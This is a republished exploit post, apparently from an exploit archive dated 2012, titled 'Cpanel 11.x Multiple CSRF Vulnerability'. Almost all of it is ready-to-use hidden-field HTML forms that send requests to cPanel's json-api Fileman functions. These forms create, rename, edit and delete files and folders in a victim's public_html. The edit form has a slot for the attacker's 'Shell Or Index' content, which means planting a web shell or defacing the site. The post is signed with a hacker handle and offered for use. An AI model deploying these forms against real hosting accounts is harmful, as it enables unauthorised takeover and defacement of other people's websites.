April 2, 2025 08:08:45 PM Menu
» » » Cpanel 11.x Multiple CRSF Vulnerability

A+ A- 
Cpanel 11.X Multiple CSRF Vulnerability
====================================================================
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.cpanel.net/
.:. Gr34T$ T0 [aboud-el]
####################################################################
===[ Exploit ]===
Add File
========
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="mkfile"/>
<input type="hidden" name="path" value="/public_html"/>
<input type="hidden" name="name" value="Palestine.php"/>
</form>
</body>
</html>
<input type="hidden" name="name" value="Palestine.php"/>  Ur File Name
Rename File
===========
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="fileop"/>
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="filelist" value="1"/>
<input type="hidden" name="multiform" value="1"/>
<input type="hidden" name="doubledecode" value="0"/>
<input type="hidden" name="op" value="rename"/>
<input type="hidden" name="metadata" value="[object HTMLTableRowElement]"/>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine.php"/>
<input type="hidden" name="destfiles" value="Test.php"/>
</body>
</html>
<input type="hidden" name="destfiles" value="Test.php"/>  New Name
Edit File
=========
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="savefile"/>
<input type="hidden" name="dir" value="/home/User/public_html"/>
<input type="hidden" name="filename" value="Palestine.php"/>
<input type="hidden" name="content" value="Ur Code (Shell Or Index)"/>
<input type="hidden" name="utf8_fallback" value="1"/>
<input type="hidden" name="charset" value="utf-8"/>
</form>
</body>
</html>
Delete File
============
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="fileop"/>
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="filelist" value="1"/>
<input type="hidden" name="multiform" value="1"/>
<input type="hidden" name="doubledecode" value="0"/>
<input type="hidden" name="op" value="unlink"/>
<input type="hidden" name="metadata" value="undefined"/>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine.php"/>
</form>
</body>
</html>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine.php"/>  File Name Delete
Add Folder
===========
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="mkdir"/>
<input type="hidden" name="path" value="/public_html"/>
<input type="hidden" name="name" value="Palestine"/>
</form>
</body>
</html>
<input type="hidden" name="name" value="Palestine"/>  Ur Folder Name
Rename Folder
=============
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="fileop"/>
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="filelist" value="1"/>
<input type="hidden" name="multiform" value="1"/>
<input type="hidden" name="doubledecode" value="0"/>
<input type="hidden" name="op" value="rename"/>
<input type="hidden" name="metadata" value="[object HTMLTableRowElement]"/>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine"/>
<input type="hidden" name="destfiles" value="Test"/>
</form>
</body>
</html>
<input type="hidden" name="destfiles" value="Test"/>  New Name
Delete Folder
=============
<form method="POST" name="form0" action="http://IP:2082/json-api/cpanel">
<input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/>
<input type="hidden" name="cpanel_jsonapi_func" value="fileop"/>
<input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/>
<input type="hidden" name="filelist" value="1"/>
<input type="hidden" name="multiform" value="1"/>
<input type="hidden" name="doubledecode" value="0"/>
<input type="hidden" name="op" value="unlink"/>
<input type="hidden" name="metadata" value="undefined"/>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine"/>
</form>
</body>
</html>
<input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine"/>  Folder Name Delete
####################################################################
# 1337day.com [2012-05-26]
07 Jun 2014
Unknown
Nhãn: ,

Share to:

vào lúc 19:34

Post a Comment

Emoticon
:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.

Subscribe to: Post Comments (Atom)
 
Top

Nhận xét mới đăng tải!

Loading…
X